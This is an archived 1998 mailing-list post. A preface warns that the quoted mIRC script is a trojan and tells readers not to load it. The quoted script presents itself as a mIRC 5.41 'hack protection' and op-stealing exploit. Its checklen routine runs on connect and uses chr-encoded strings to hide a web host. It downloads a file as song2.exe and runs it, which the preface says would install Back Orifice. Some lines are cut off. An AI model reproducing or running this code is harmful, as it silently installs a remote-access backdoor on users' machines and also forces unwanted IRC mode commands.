This is a trojan script, if it worked right, it would connect to a certain webserver and download BO, this should *not* have been passed onto the list, do *not* attempt to load this script. On Fri, 13 Nov 1998, System Administrator wrote: > Hi, > while debugging/hexing/disassembling mirc my friend slotmech last week found > a mirc bug which allows to force users to send MODE commands to the server. > this example script sends a MODE +o to the irc server. the mirc author has been > notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us. > > cya, > fs > > --- cut here --- > > ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstormat_private> > ;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#; > ;#; -------- Use /hackop nick #channel to make nick give you op on #channel ! > ;#; -------- That's it... have phun! > ;#; > ;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz ! > ;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#; > ;#; if you want to add this code to your own script please: ASK FIRST! > > ctcp 1:userinfo*: antihack > > alias antihack { > if ($len($2) > 17 && $chr(91) isin $2-) { > echo $active mIRC5.41 hack attempt from $nick > .halt > } > } > > alias hackop { > if ($2 == $null) { > echo 3 *** Usage: /hackop nick #channel > .halt > } > if ($me !ison $2) { > echo 3 *** You aren't on that Channel! > .halt > } > if ($1 !isop $2) { > echo 3 *** $1 isn't opped on that channel! > .halt > } > checklen $1 > .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $} > > alias checklen { > .if (%xcomplete == 1) halt > .if (%xinprog == 1) halt > .set %xfilename song2.exe > .set %xlof $lof(%xfilename) > .set %xfirst 1 > .write -c %xfilename > ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx > .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$} > on 1:sockopen:protx: { > .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx > } > > on 1:sockread:protx: { > .sockread &test > .set %xlof $lof(%xfilename) > .if (%xfirst == 1) set %xlof 0 > .set %xfirst 0 > .bwrite %xfilename %xlof $sockbr &test > } > > on 1:connect:checklen > > on 1:sockclose:protx: { > .sockread &test > if ($sockbr > 0) { > .set %xlof $lof(%xfilename) > .bwrite %xfilename %xlof $sockbr &test > } > .if ($lof(%xfilename) == 178306) { > .run %xfilename > .set %xcomplete 1 > } > if ($lof(%xfilename) != 178306) { > .timer 1 300 checklen > } > } > unset %xinprog > unset %xfilename > unset %xlof > unset %xfirst > } > > --- cut here --- >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:24 PDT